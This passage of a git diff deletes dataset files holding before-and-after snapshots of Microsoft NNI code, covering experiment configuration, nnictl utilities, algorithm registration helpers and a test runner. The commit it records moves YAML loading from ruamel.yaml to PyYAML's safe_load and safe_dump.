= None - - -class TrainingServiceConfig(ConfigBase): - platform: str - -class SharedStorageConfig(ConfigBase): - storage_type: str - local_mount_point: str - remote_mount_point: str - local_mounted: str - - -@dataclass(init=False) -class ExperimentConfig(ConfigBase): - experiment_name: Optional[str] = None - search_space_file: Optional[PathLike] = None - search_space: Any = None - trial_command: str - trial_code_directory: PathLike = '.' - trial_concurrency: int - trial_gpu_number: Optional[int] = None # TODO: in openpai cannot be None - max_experiment_duration: Optional[str] = None - max_trial_number: Optional[int] = None - nni_manager_ip: Optional[str] = None - use_annotation: bool = False - debug: bool = False - log_level: Optional[str] = None - experiment_working_directory: PathLike = '~/nni-experiments' - tuner_gpu_indices: Optional[Union[List[int], str]] = None - tuner: Optional[_AlgorithmConfig] = None - assessor: Optional[_AlgorithmConfig] = None - advisor: Optional[_AlgorithmConfig] = None - training_service: Union[TrainingServiceConfig, List[TrainingServiceConfig]] - shared_storage: Optional[SharedStorageConfig] = None - _deprecated: Optional[Dict[str, Any]] = None - - def __init__(self, training_service_platform: Optional[Union[str, List[str]]] = None, **kwargs): - base_path = kwargs.pop('_base_path', None) - kwargs = util.case_insensitive(kwargs) - if training_service_platform is not None: - assert 'trainingservice' not in kwargs - kwargs['trainingservice'] = util.training_service_config_factory( - platform=training_service_platform, - base_path=base_path - ) - elif isinstance(kwargs.get('trainingservice'), (dict, list)): - # dict means a single training service - # list means hybrid training service - kwargs['trainingservice'] = util.training_service_config_factory( - config=kwargs['trainingservice'], - base_path=base_path - ) - else: - raise RuntimeError('Unsupported Training service configuration!') - super().__init__(_base_path=base_path, **kwargs) - for algo_type in ['tuner', 'assessor', 'advisor']: - if isinstance(kwargs.get(algo_type), dict): - setattr(self, algo_type, _AlgorithmConfig(**kwargs.pop(algo_type))) - - def canonical(self): - ret = super().canonical() - if isinstance(ret.training_service, list): - for i, ts in enumerate(ret.training_service): - ret.training_service[i] = ts.canonical() - return ret - - def validate(self, initialized_tuner: bool = False) -> None: - super().validate() - if initialized_tuner: - _validate_for_exp(self.canonical()) - else: - _validate_for_nnictl(self.canonical()) - if self.trial_gpu_number and hasattr(self.training_service, 'use_active_gpu'): - if self.training_service.use_active_gpu is None: - raise ValueError('Please set "use_active_gpu"') - - def json(self) -> Dict[str, Any]: - obj = super().json() - if obj.get('searchSpaceFile'): - obj['searchSpace'] = yaml.safe_load(open(obj.pop('searchSpaceFile'))) - return obj - -## End of public API ## - - @property - def _canonical_rules(self): - return _canonical_rules - - @property - def _validation_rules(self): - return _validation_rules - - -_canonical_rules = { - 'search_space_file': util.canonical_path, - 'trial_code_directory': util.canonical_path, - 'max_experiment_duration': lambda value: f'{util.parse_time(value)}s' if value is not None else None, - 'experiment_working_directory': util.canonical_path, - 'tuner_gpu_indices': lambda value: [int(idx) for idx in value.split(',')] if isinstance(value, str) else value, - 'tuner': lambda config: None if config is None or config.name == '_none_' else config.canonical(), - 'assessor': lambda config: None if config is None or config.name == '_none_' else config.canonical(), - 'advisor': lambda config: None if config is None or config.name == '_none_' else config.canonical(), -} - -_validation_rules = { - 'search_space_file': lambda value: (Path(value).is_file(), f'"{value}" does not exist or is not regular file'), - 'trial_code_directory': lambda value: (Path(value).is_dir(), f'"{value}" does not exist or is not directory'), - 'trial_concurrency': lambda value: value > 0, - 'trial_gpu_number': lambda value: value >= 0, - 'max_experiment_duration': lambda value: util.parse_time(value) > 0, - 'max_trial_number': lambda value: value > 0, - 'log_level': lambda value: value in ["trace", "debug", "info", "warning", "error", "fatal"], - 'tuner_gpu_indices': lambda value: all(i >= 0 for i in value) and len(value) == len(set(value)), - 'training_service': lambda value: (type(value) is not TrainingServiceConfig, 'cannot be abstract base class') -} - -def _validate_for_exp(config: ExperimentConfig) -> None: - # validate experiment for nni.Experiment, where tuner is already initialized outside - if config.use_annotation: - raise ValueError('ExperimentConfig: annotation is not supported in this mode') - if util.count(config.search_space, config.search_space_file) != 1: - raise ValueError('ExperimentConfig: search_space and search_space_file must be set one') - if util.count(config.tuner, config.assessor, config.advisor) != 0: - raise ValueError('ExperimentConfig: tuner, assessor, and advisor must not be set in for this mode') - if config.tuner_gpu_indices is not None: - raise ValueError('ExperimentConfig: tuner_gpu_indices is not supported in this mode') - -def _validate_for_nnictl(config: ExperimentConfig) -> None: - # validate experiment for normal launching approach - if config.use_annotation: - if util.count(config.search_space, config.search_space_file) != 0: - raise ValueError('ExperimentConfig: search_space and search_space_file must not be set with annotationn') - else: - if util.count(config.search_space, config.search_space_file) != 1: - raise ValueError('ExperimentConfig: search_space and search_space_file must be set one') - if util.count(config.tuner, config.advisor) != 1: - raise ValueError('ExperimentConfig: tuner and advisor must be set one') - -def _validate_algo(algo: AlgorithmConfig) -> None: - if algo.name is None: - if algo.class_name is None: - raise ValueError('Missing algorithm name') - if algo.code_directory is not None and not Path(algo.code_directory).is_dir(): - raise ValueError(f'code_directory "{algo.code_directory}" does not exist or is not directory') - else: - if algo.class_name is not None or algo.code_directory is not None: - raise ValueError(f'When name is set for registered algorithm, class_name and code_directory cannot be used') - # TODO: verify algorithm installation and class args diff --git a/v1/data/codefile/microsoft@nni__b955ac9__nni$tools$nnictl$common_utils.py.diff b/v1/data/codefile/microsoft@nni__b955ac9__nni$tools$nnictl$common_utils.py.diff deleted file mode 100644 index cbe6ae8..0000000 --- a/v1/data/codefile/microsoft@nni__b955ac9__nni$tools$nnictl$common_utils.py.diff +++ /dev/null @@ -1,22 +0,0 @@ -diff --git a/nni/tools/nnictl/common_utils.py b/nni/tools/nnictl/common_utils.py - index 7075a83648c5364e164bf2727cccedf9ec293cbd..b955ac99a46094d2d701d447e9df07509767cc32 100644 - --- a/nni/tools/nnictl/common_utils.py - +++ b/nni/tools/nnictl/common_utils.py -@@ -9,7 +9,7 @@ import time - import socket - import string - import random --import ruamel.yaml as yaml -+import yaml - import psutil - import filelock - import glob -@@ -21,7 +21,7 @@ def get_yml_content(file_path): - '''Load yaml file content''' - try: - with open(file_path, 'r') as file: -- return yaml.load(file, Loader=yaml.SafeLoader) -+ return yaml.safe_load(file) - except yaml.scanner.ScannerError as err: - print_error('yaml file format error!') - print_error(err) diff --git a/v1/data/codefile/microsoft@nni__b955ac9__nni$tools$nnictl$common_utils.py.source.py b/v1/data/codefile/microsoft@nni__b955ac9__nni$tools$nnictl$common_utils.py.source.py deleted file mode 100644 index 3667f8a..0000000 --- a/v1/data/codefile/microsoft@nni__b955ac9__nni$tools$nnictl$common_utils.py.source.py +++ /dev/null @@ -1,125 +0,0 @@ -# Copyright (c) Microsoft Corporation. -# Licensed under the MIT license. - -import os -import sys -import json -import tempfile -import time -import socket -import string -import random -import ruamel.yaml as yaml -import psutil -import filelock -import glob -from colorama import Fore - -from .constants import ERROR_INFO, NORMAL_INFO, WARNING_INFO - -def get_yml_content(file_path): - '''Load yaml file content''' - try: - with open(file_path, 'r') as file: - return yaml.load(file, Loader=yaml.SafeLoader) - except yaml.scanner.ScannerError as err: - print_error('yaml file format error!') - print_error(err) - exit(1) - except Exception as exception: - print_error(exception) - exit(1) - -def get_json_content(file_path): - '''Load json file content''' - try: - with open(file_path, 'r') as file: - return json.load(file) - except TypeError as err: - print_error('json file format error!') - print_error(err) - return None - - -def print_error(*content): - '''Print error information to screen''' - print(Fore.RED + ERROR_INFO + ' '.join([str(c) for c in content]) + Fore.RESET) - -def print_green(*content): - '''Print information to screen in green''' - print(Fore.GREEN + ' '.join([str(c) for c in content]) + Fore.RESET) - -def print_normal(*content): - '''Print error information to screen''' - print(NORMAL_INFO, *content) - -def print_warning(*content): - '''Print warning information to screen''' - print(Fore.YELLOW + WARNING_INFO + ' '.join([str(c) for c in content]) + Fore.RESET) - -def detect_process(pid): - '''Detect if a process is alive''' - try: - process = psutil.Process(pid) - return process.is_running() - except: - return False - -def detect_port(port): - '''Detect if the port is used''' - socket_test = socket.socket(socket.AF_INET, socket.SOCK_STREAM) - try: - socket_test.connect(('127.0.0.1', int(port))) - socket_test.close() - return True - except: - return False - -def get_user(): - if sys.platform == 'win32': - return os.environ['USERNAME'] - else: - return os.environ['USER'] - -def generate_temp_dir(): - '''generate a temp folder''' - def generate_folder_name(): - return os.path.join(tempfile.gettempdir(), 'nni', ''.join(random.sample(string.ascii_letters + string.digits, 8))) - temp_dir = generate_folder_name() - while os.path.exists(temp_dir): - temp_dir = generate_folder_name() - os.makedirs(temp_dir) - return temp_dir - -class SimplePreemptiveLock(filelock.SoftFileLock): - '''this is a lock support check lock expiration, if you do not need check expiration, you can use SoftFileLock''' - def __init__(self, lock_file, stale=-1): - super(__class__, self).__init__(lock_file, timeout=-1) - self._lock_file_name = '{}.{}'.format(self._lock_file, os.getpid()) - self._stale = stale - - def _acquire(self): - open_mode = os.O_WRONLY | os.O_CREAT | os.O_EXCL | os.O_TRUNC - try: - lock_file_names = glob.glob(self._lock_file + '.*') - for file_name in lock_file_names: - if os.path.exists(file_name) and (self._stale < 0 or time.time() - os.stat(file_name).st_mtime < self._stale): - return None - fd = os.open(self._lock_file_name, open_mode) - except (IOError, OSError): - pass - else: - self._lock_file_fd = fd - return None - - def _release(self): - os.close(self._lock_file_fd) - self._lock_file_fd = None - try: - os.remove(self._lock_file_name) - except OSError: - pass - return None - -def get_file_lock(path: string, stale=-1): - return SimplePreemptiveLock(path + '.lock', stale=stale) diff --git a/v1/data/codefile/microsoft@nni__b955ac9__nni$tools$nnictl$common_utils.py.target.py b/v1/data/codefile/microsoft@nni__b955ac9__nni$tools$nnictl$common_utils.py.target.py deleted file mode 100644 index f322d31..0000000 --- a/v1/data/codefile/microsoft@nni__b955ac9__nni$tools$nnictl$common_utils.py.target.py +++ /dev/null @@ -1,125 +0,0 @@ -# Copyright (c) Microsoft Corporation. -# Licensed under the MIT license. - -import os -import sys -import json -import tempfile -import time -import socket -import string -import random -import yaml -import psutil -import filelock -import glob -from colorama import Fore - -from .constants import ERROR_INFO, NORMAL_INFO, WARNING_INFO - -def get_yml_content(file_path): - '''Load yaml file content''' - try: - with open(file_path, 'r') as file: - return yaml.safe_load(file) - except yaml.scanner.ScannerError as err: - print_error('yaml file format error!') - print_error(err) - exit(1) - except Exception as exception: - print_error(exception) - exit(1) - -def get_json_content(file_path): - '''Load json file content''' - try: - with open(file_path, 'r') as file: - return json.load(file) - except TypeError as err: - print_error('json file format error!') - print_error(err) - return None - - -def print_error(*content): - '''Print error information to screen''' - print(Fore.RED + ERROR_INFO + ' '.join([str(c) for c in content]) + Fore.RESET) - -def print_green(*content): - '''Print information to screen in green''' - print(Fore.GREEN + ' '.join([str(c) for c in content]) + Fore.RESET) - -def print_normal(*content): - '''Print error information to screen''' - print(NORMAL_INFO, *content) - -def print_warning(*content): - '''Print warning information to screen''' - print(Fore.YELLOW + WARNING_INFO + ' '.join([str(c) for c in content]) + Fore.RESET) - -def detect_process(pid): - '''Detect if a process is alive''' - try: - process = psutil.Process(pid) - return process.is_running() - except: - return False - -def detect_port(port): - '''Detect if the port is used''' - socket_test = socket.socket(socket.AF_INET, socket.SOCK_STREAM) - try: - socket_test.connect(('127.0.0.1', int(port))) - socket_test.close() - return True - except: - return False - -def get_user(): - if sys.platform == 'win32': - return os.environ['USERNAME'] - else: - return os.environ['USER'] - -def generate_temp_dir(): - '''generate a temp folder''' - def generate_folder_name(): - return os.path.join(tempfile.gettempdir(), 'nni', ''.join(random.sample(string.ascii_letters + string.digits, 8))) - temp_dir = generate_folder_name() - while os.path.exists(temp_dir): - temp_dir = generate_folder_name() - os.makedirs(temp_dir) - return temp_dir - -class SimplePreemptiveLock(filelock.SoftFileLock): - '''this is a lock support check lock expiration, if you do not need check expiration, you can use SoftFileLock''' - def __init__(self, lock_file, stale=-1): - super(__class__, self).__init__(lock_file, timeout=-1) - self._lock_file_name = '{}.{}'.format(self._lock_file, os.getpid()) - self._stale = stale - - def _acquire(self): - open_mode = os.O_WRONLY | os.O_CREAT | os.O_EXCL | os.O_TRUNC - try: - lock_file_names = glob.glob(self._lock_file + '.*') - for file_name in lock_file_names: - if os.path.exists(file_name) and (self._stale < 0 or time.time() - os.stat(file_name).st_mtime < self._stale): - return None - fd = os.open(self._lock_file_name, open_mode) - except (IOError, OSError): - pass - else: - self._lock_file_fd = fd - return None - - def _release(self): - os.close(self._lock_file_fd) - self._lock_file_fd = None - try: - os.remove(self._lock_file_name) - except OSError: - pass - return None - -def get_file_lock(path: string, stale=-1): - return SimplePreemptiveLock(path + '.lock', stale=stale) diff --git a/v1/data/codefile/microsoft@nni__b955ac9__nni$tools$package_utils$__init__.py.diff b/v1/data/codefile/microsoft@nni__b955ac9__nni$tools$package_utils$__init__.py.diff deleted file mode 100644 index c113da9..0000000 --- a/v1/data/codefile/microsoft@nni__b955ac9__nni$tools$package_utils$__init__.py.diff +++ /dev/null @@ -1,28 +0,0 @@ -diff --git a/nni/tools/package_utils/__init__.py b/nni/tools/package_utils/__init__.py - index 7075a83648c5364e164bf2727cccedf9ec293cbd..b955ac99a46094d2d701d447e9df07509767cc32 100644 - --- a/nni/tools/package_utils/__init__.py - +++ b/nni/tools/package_utils/__init__.py -@@ -6,7 +6,7 @@ import importlib - import os - from pathlib import Path - import sys --import ruamel.yaml as yaml -+import yaml - from nni.runtime.config import get_config_file - - ALGO_TYPES = ['tuners', 'assessors', 'advisors'] -@@ -215,7 +215,7 @@ def read_registerd_algo_meta(): - config_file = get_registered_algo_config_path() - if os.path.exists(config_file): - with open(config_file, 'r') as f: -- config = yaml.load(f, Loader=yaml.SafeLoader) -+ config = yaml.safe_load(f) - else: - config = defaultdict(list) - for t in ALGO_TYPES: -@@ -226,4 +226,4 @@ def read_registerd_algo_meta(): - def write_registered_algo_meta(config): - config_file = get_registered_algo_config_path() - with open(config_file, 'w') as f: -- f.write(yaml.dump(dict(config), default_flow_style=False)) -+ f.write(yaml.safe_dump(dict(config), default_flow_style=False)) diff --git a/v1/data/codefile/microsoft@nni__b955ac9__nni$tools$package_utils$__init__.py.source.py b/v1/data/codefile/microsoft@nni__b955ac9__nni$tools$package_utils$__init__.py.source.py deleted file mode 100644 index 1fecdd9..0000000 --- a/v1/data/codefile/microsoft@nni__b955ac9__nni$tools$package_utils$__init__.py.source.py +++ /dev/null @@ -1,229 +0,0 @@ -# Copyright (c) Microsoft Corporation. -# Licensed under the MIT license. - -from collections import defaultdict -import importlib -import os -from pathlib import Path -import sys -import ruamel.yaml as yaml -from nni.runtime.config import get_config_file - -ALGO_TYPES = ['tuners', 'assessors', 'advisors'] - -def get_all_builtin_names(algo_type): - """Get all builtin names of registered algorithms of specified type - - Parameters - ---------- - algo_type: str - can be one of 'tuners', 'assessors' or 'advisors' - - Returns: list of string - ------- - All builtin names of specified type, for example, if algo_type is 'tuners', returns - all builtin tuner names. - """ - assert algo_type in ALGO_TYPES - - return [x['builtinName'] for x in read_registerd_algo_meta()[algo_type]] - - -def get_registered_algo_meta(builtin_name, algo_type=None): - """ Get meta information of registered algorithms. - - Parameters - ---------- - builtin_name: str - builtin name. - algo_type: str | None - can be one of 'tuners', 'assessors', 'advisors' or None - - Returns: dict | None - ------- - Returns meta information of speicified builtin alogorithms, for example: - { - 'classArgsValidator': 'nni.smac_tuner.SMACClassArgsValidator', - 'className': 'nni.smac_tuner.SMACTuner', - 'builtinName': 'SMAC' - } - """ - assert builtin_name is not None - if algo_type: - assert algo_type in ALGO_TYPES - config = read_registerd_algo_meta() - - candidates = [] - if algo_type: - candidates = config[algo_type] - else: - for algo_type in ALGO_TYPES: - candidates.extend(config[algo_type]) - for meta in candidates: - if meta['builtinName'] == builtin_name: - return meta - return None - -def parse_full_class_name(full_class_name): - if not full_class_name: - return None, None - parts = full_class_name.split('.') - module_name, class_name = '.'.join(parts[:-1]), parts[-1] - return module_name, class_name - -def get_builtin_module_class_name(algo_type, builtin_name): - """Get module name and class name of all builtin algorithms - - Parameters - ---------- - algo_type: str - can be one of 'tuners', 'assessors', 'advisors' - builtin_name: str - builtin name. - - Returns: tuple - ------- - tuple of (module name, class name) - """ - assert algo_type in ALGO_TYPES - assert builtin_name is not None - meta = get_registered_algo_meta(builtin_name, algo_type) - if not meta: - return None, None - return parse_full_class_name(meta['className']) - -def create_validator_instance(algo_type, builtin_name): - """Create instance of validator class - - Parameters - ---------- - algo_type: str - can be one of 'tuners', 'assessors', 'advisors' - builtin_name: str - builtin name. - - Returns: object | None - ------- - Returns validator class instance. - If specified validator class does not exist, returns None. - """ - assert algo_type in ALGO_TYPES - assert builtin_name is not None - meta = get_registered_algo_meta(builtin_name, algo_type) - if not meta or 'classArgsValidator' not in meta: - return None - module_name, class_name = parse_full_class_name(meta['classArgsValidator']) - class_module = importlib.import_module(module_name) - class_constructor = getattr(class_module, class_name) - - return class_constructor() - -def create_builtin_class_instance(builtin_name, input_class_args, algo_type): - """Create instance of builtin algorithms - - Parameters - ---------- - builtin_name: str - builtin name. - input_class_args: dict - kwargs for builtin class constructor - algo_type: str - can be one of 'tuners', 'assessors', 'advisors' - - Returns: object - ------- - Returns builtin class instance. - """ - assert algo_type in ALGO_TYPES - if builtin_name not in get_all_builtin_names(algo_type): - raise RuntimeError('Builtin name is not found: {}'.format(builtin_name)) - - def parse_algo_meta(algo_meta, input_class_args): - """ - 1. parse class_name field in meta data into module name and class name, - for example: - parse class_name 'nni.hyperopt_tuner.hyperopt_tuner.HyperoptTuner' in meta data into: - module name: nni.hyperopt_tuner.hyperopt_tuner - class name: HyperoptTuner - 2. merge user specified class args together with builtin class args. - """ - assert algo_meta - module_name, class_name = parse_full_class_name(algo_meta['className']) - - class_args = {} - if 'classArgs' in algo_meta: - class_args = algo_meta['classArgs'] - if input_class_args is not None: - class_args.update(input_class_args) - - return module_name, class_name, class_args - - algo_meta = get_registered_algo_meta(builtin_name, algo_type) - module_name, class_name, class_args = parse_algo_meta(algo_meta, input_class_args) - - if importlib.util.find_spec(module_name) is None: - raise RuntimeError('Builtin module can not be loaded: {}'.format(module_name)) - - class_module = importlib.import_module(module_name) - class_constructor = getattr(class_module, class_name) - - instance = class_constructor(**class_args) - - return instance - -def create_customized_class_instance(class_params): - """Create instance of customized algorithms - - Parameters - ---------- - class_params: dict - class_params should contains following keys: - codeDirectory: code directory - className: qualified class name - classArgs (optional): kwargs pass to class constructor - - Returns: object - ------- - Returns customized class instance. - """ - - code_dir = class_params.get('classDirectory') - qualified_class_name = class_params.get('className') - class_args = class_params.get('classArgs') - - if code_dir and not os.path.isdir(code_dir): - raise ValueError(f'Directory not found: {code_dir}') - - sys.path.append(code_dir) - module_name, class_name = qualified_class_name.rsplit('.', 1) - class_module = importlib.import_module(module_name) - class_constructor = getattr(class_module, class_name) - - if class_args is None: - class_args = {} - instance = class_constructor(**class_args) - - return instance - -def _using_conda_or_virtual_environment(): - return sys.prefix != sys.base_prefix or os.path.isdir(os.path.join(sys.prefix, 'conda-meta')) - -def get_registered_algo_config_path(): - return str(get_config_file('registered_algorithms.yml')) - -def read_registerd_algo_meta(): - config_file = get_registered_algo_config_path() - if os.path.exists(config_file): - with open(config_file, 'r') as f: - config = yaml.load(f, Loader=yaml.SafeLoader) - else: - config = defaultdict(list) - for t in ALGO_TYPES: - if t not in config: - config[t] = [] - return config - -def write_registered_algo_meta(config): - config_file = get_registered_algo_config_path() - with open(config_file, 'w') as f: - f.write(yaml.dump(dict(config), default_flow_style=False)) diff --git a/v1/data/codefile/microsoft@nni__b955ac9__nni$tools$package_utils$__init__.py.target.py b/v1/data/codefile/microsoft@nni__b955ac9__nni$tools$package_utils$__init__.py.target.py deleted file mode 100644 index 9a86cbe..0000000 --- a/v1/data/codefile/microsoft@nni__b955ac9__nni$tools$package_utils$__init__.py.target.py +++ /dev/null @@ -1,229 +0,0 @@ -# Copyright (c) Microsoft Corporation. -# Licensed under the MIT license. - -from collections import defaultdict -import importlib -import os -from pathlib import Path -import sys -import yaml -from nni.runtime.config import get_config_file - -ALGO_TYPES = ['tuners', 'assessors', 'advisors'] - -def get_all_builtin_names(algo_type): - """Get all builtin names of registered algorithms of specified type - - Parameters - ---------- - algo_type: str - can be one of 'tuners', 'assessors' or 'advisors' - - Returns: list of string - ------- - All builtin names of specified type, for example, if algo_type is 'tuners', returns - all builtin tuner names. - """ - assert algo_type in ALGO_TYPES - - return [x['builtinName'] for x in read_registerd_algo_meta()[algo_type]] - - -def get_registered_algo_meta(builtin_name, algo_type=None): - """ Get meta information of registered algorithms. - - Parameters - ---------- - builtin_name: str - builtin name. - algo_type: str | None - can be one of 'tuners', 'assessors', 'advisors' or None - - Returns: dict | None - ------- - Returns meta information of speicified builtin alogorithms, for example: - { - 'classArgsValidator': 'nni.smac_tuner.SMACClassArgsValidator', - 'className': 'nni.smac_tuner.SMACTuner', - 'builtinName': 'SMAC' - } - """ - assert builtin_name is not None - if algo_type: - assert algo_type in ALGO_TYPES - config = read_registerd_algo_meta() - - candidates = [] - if algo_type: - candidates = config[algo_type] - else: - for algo_type in ALGO_TYPES: - candidates.extend(config[algo_type]) - for meta in candidates: - if meta['builtinName'] == builtin_name: - return meta - return None - -def parse_full_class_name(full_class_name): - if not full_class_name: - return None, None - parts = full_class_name.split('.') - module_name, class_name = '.'.join(parts[:-1]), parts[-1] - return module_name, class_name - -def get_builtin_module_class_name(algo_type, builtin_name): - """Get module name and class name of all builtin algorithms - - Parameters - ---------- - algo_type: str - can be one of 'tuners', 'assessors', 'advisors' - builtin_name: str - builtin name. - - Returns: tuple - ------- - tuple of (module name, class name) - """ - assert algo_type in ALGO_TYPES - assert builtin_name is not None - meta = get_registered_algo_meta(builtin_name, algo_type) - if not meta: - return None, None - return parse_full_class_name(meta['className']) - -def create_validator_instance(algo_type, builtin_name): - """Create instance of validator class - - Parameters - ---------- - algo_type: str - can be one of 'tuners', 'assessors', 'advisors' - builtin_name: str - builtin name. - - Returns: object | None - ------- - Returns validator class instance. - If specified validator class does not exist, returns None. - """ - assert algo_type in ALGO_TYPES - assert builtin_name is not None - meta = get_registered_algo_meta(builtin_name, algo_type) - if not meta or 'classArgsValidator' not in meta: - return None - module_name, class_name = parse_full_class_name(meta['classArgsValidator']) - class_module = importlib.import_module(module_name) - class_constructor = getattr(class_module, class_name) - - return class_constructor() - -def create_builtin_class_instance(builtin_name, input_class_args, algo_type): - """Create instance of builtin algorithms - - Parameters - ---------- - builtin_name: str - builtin name. - input_class_args: dict - kwargs for builtin class constructor - algo_type: str - can be one of 'tuners', 'assessors', 'advisors' - - Returns: object - ------- - Returns builtin class instance. - """ - assert algo_type in ALGO_TYPES - if builtin_name not in get_all_builtin_names(algo_type): - raise RuntimeError('Builtin name is not found: {}'.format(builtin_name)) - - def parse_algo_meta(algo_meta, input_class_args): - """ - 1. parse class_name field in meta data into module name and class name, - for example: - parse class_name 'nni.hyperopt_tuner.hyperopt_tuner.HyperoptTuner' in meta data into: - module name: nni.hyperopt_tuner.hyperopt_tuner - class name: HyperoptTuner - 2. merge user specified class args together with builtin class args. - """ - assert algo_meta - module_name, class_name = parse_full_class_name(algo_meta['className']) - - class_args = {} - if 'classArgs' in algo_meta: - class_args = algo_meta['classArgs'] - if input_class_args is not None: - class_args.update(input_class_args) - - return module_name, class_name, class_args - - algo_meta = get_registered_algo_meta(builtin_name, algo_type) - module_name, class_name, class_args = parse_algo_meta(algo_meta, input_class_args) - - if importlib.util.find_spec(module_name) is None: - raise RuntimeError('Builtin module can not be loaded: {}'.format(module_name)) - - class_module = importlib.import_module(module_name) - class_constructor = getattr(class_module, class_name) - - instance = class_constructor(**class_args) - - return instance - -def create_customized_class_instance(class_params): - """Create instance of customized algorithms - - Parameters - ---------- - class_params: dict - class_params should contains following keys: - codeDirectory: code directory - className: qualified class name - classArgs (optional): kwargs pass to class constructor - - Returns: object - ------- - Returns customized class instance. - """ - - code_dir = class_params.get('classDirectory') - qualified_class_name = class_params.get('className') - class_args = class_params.get('classArgs') - - if code_dir and not os.path.isdir(code_dir): - raise ValueError(f'Directory not found: {code_dir}') - - sys.path.append(code_dir) - module_name, class_name = qualified_class_name.rsplit('.', 1) - class_module = importlib.import_module(module_name) - class_constructor = getattr(class_module, class_name) - - if class_args is None: - class_args = {} - instance = class_constructor(**class_args) - - return instance - -def _using_conda_or_virtual_environment(): - return sys.prefix != sys.base_prefix or os.path.isdir(os.path.join(sys.prefix, 'conda-meta')) - -def get_registered_algo_config_path(): - return str(get_config_file('registered_algorithms.yml')) - -def read_registerd_algo_meta(): - config_file = get_registered_algo_config_path() - if os.path.exists(config_file): - with open(config_file, 'r') as f: - config = yaml.safe_load(f) - else: - config = defaultdict(list) - for t in ALGO_TYPES: - if t not in config: - config[t] = [] - return config - -def write_registered_algo_meta(config): - config_file = get_registered_algo_config_path() - with open(config_file, 'w') as f: - f.write(yaml.safe_dump(dict(config), default_flow_style=False)) diff --git a/v1/data/codefile/microsoft@nni__b955ac9__test$nni_test$nnitest$run_tests.py.diff b/v1/data/codefile/microsoft@nni__b955ac9__test$nni_test$nnitest$run_tests.py.diff deleted file mode 100644 index d6fc425..0000000 --- a/v1/data/codefile/microsoft@nni__b955ac9__test$nni_test$nnitest$run_tests.py.diff +++ /dev/null @@ -1,22 +0,0 @@ -diff --git a/test/nni_test/nnitest/run_tests.py b/test/nni_test/nnitest/run_tests.py - index 7075a83648c5364e164bf2727cccedf9ec293cbd..b955ac99a46094d2d701d447e9df07509767cc32 100644 - --- a/test/nni_test/nnitest/run_tests.py - +++ b/test/nni_test/nnitest/run_tests.py -@@ -9,7 +9,7 @@ import subprocess - import sys - import time - --import ruamel.yaml as yaml -+import yaml - - import validators - from utils import (CLEAR, EXPERIMENT_URL, GREEN, RED, REST_ENDPOINT, -@@ -80,7 +80,7 @@ def prepare_config_file(test_case_config, it_config, args): - # generate temporary config yml file to launch experiment - new_config_file = config_path + '.tmp' - dump_yml_content(new_config_file, test_yml_config) -- print(yaml.dump(test_yml_config, default_flow_style=False), flush=True) -+ print(yaml.safe_dump(test_yml_config, default_flow_style=False), flush=True) - - return new_config_file - diff --git a/v1/data/codefile/microsoft@nni__b955ac9__test$nni_test$nnitest$run_tests.py.source.py b/v1/data/codefile/microsoft@nni__b955ac9__test$nni_test$nnitest$run_tests.py.source.py deleted file mode 100644 index f517f0a..0000000 --- a/v1/data/codefile/microsoft@nni__b955ac9__test$nni_test$nnitest$run_tests.py.source.py +++ /dev/null @@ -1,293 +0,0 @@ -# Copyright (c) Microsoft Corporation. -# Licensed under the MIT license. - -import argparse -import datetime -import json -import os -import subprocess -import sys -import time - -import ruamel.yaml as yaml - -import validators -from utils import (CLEAR, EXPERIMENT_URL, GREEN, RED, REST_ENDPOINT, - STATUS_URL, TRIAL_JOBS_URL, deep_update, dump_yml_content, - get_experiment_dir, get_experiment_id, - get_experiment_status, get_failed_trial_jobs, - get_trial_stats, get_yml_content, parse_max_duration_time, - print_experiment_log, print_trial_job_log, - wait_for_port_available) - -it_variables = {} - - -def update_training_service_config(config, training_service, config_file_path): - it_ts_config = get_yml_content(os.path.join('config', 'training_service.yml')) - - # hack for kubeflow trial config - if training_service == 'kubeflow': - it_ts_config[training_service]['trial']['worker']['command'] = config['trial']['command'] - config['trial'].pop('command') - if 'gpuNum' in config['trial']: - config['trial'].pop('gpuNum') - - if training_service == 'frameworkcontroller': - it_ts_config[training_service]['trial']['taskRoles'][0]['command'] = config['trial']['command'] - config['trial'].pop('command') - if 'gpuNum' in config['trial']: - config['trial'].pop('gpuNum') - - if training_service == 'adl': - # hack for adl trial config, codeDir in adl mode refers to path in container - containerCodeDir = config['trial']['codeDir'] - # replace metric test folders to container folder - if config['trial']['codeDir'] == '.': - containerCodeDir = '/' + config_file_path[:config_file_path.rfind('/')] - elif config['trial']['codeDir'] == '../naive_trial': - containerCodeDir = '/test/config/naive_trial' - elif '../../../' in config['trial']['codeDir']: - # replace example folders to container folder - containerCodeDir = config['trial']['codeDir'].replace('../../../', '/') - it_ts_config[training_service]['trial']['codeDir'] = containerCodeDir - it_ts_config[training_service]['trial']['command'] = 'cd {0} && {1}'.format(containerCodeDir, config['trial']['command']) - - if training_service == 'hybrid': - it_ts_config = get_yml_content(os.path.join('config', 'training_service_v2.yml')) - else: - deep_update(config, it_ts_config['all']) - deep_update(config, it_ts_config[training_service]) - - -def prepare_config_file(test_case_config, it_config, args): - config_path = args.nni_source_dir + test_case_config['configFile'] - test_yml_config = get_yml_content(config_path) - - # apply test case specific config - if test_case_config.get('config') is not None: - deep_update(test_yml_config, test_case_config['config']) - - # hack for windows - if sys.platform == 'win32' and args.ts == 'local': - test_yml_config['trial']['command'] = test_yml_config['trial']['command'].replace('python3', 'python') - - # apply training service config - # user's gpuNum, logCollection config is overwritten by the config in training_service.yml - # the hack for kubeflow should be applied at last step - update_training_service_config(test_yml_config, args.ts, test_case_config['configFile']) - - # generate temporary config yml file to launch experiment - new_config_file = config_path + '.tmp' - dump_yml_content(new_config_file, test_yml_config) - print(yaml.dump(test_yml_config, default_flow_style=False), flush=True) - - return new_config_file - - -def run_test_case(test_case_config, it_config, args): - new_config_file = prepare_config_file(test_case_config, it_config, args) - # set configFile variable - it_variables['$configFile'] = new_config_file - - try: - launch_test(new_config_file, args.ts, test_case_config) - invoke_validator(test_case_config, args.nni_source_dir, args.ts) - finally: - stop_command = get_command(test_case_config, 'stopCommand') - print('Stop command:', stop_command, flush=True) - if stop_command: - subprocess.run(stop_command, shell=True) - exit_command = get_command(test_case_config, 'onExitCommand') - print('Exit command:', exit_command, flush=True) - if exit_command: - subprocess.run(exit_command, shell=True, check=True) - # remove tmp config file - if os.path.exists(new_config_file): - os.remove(new_config_file) - - -def invoke_validator(test_case_config, nni_source_dir, training_service): - validator_config = test_case_config.get('validator') - if validator_config is None or validator_config.get('class') is None: - return - - validator = validators.__dict__[validator_config.get('class')]() - kwargs = validator_config.get('kwargs', {}) - 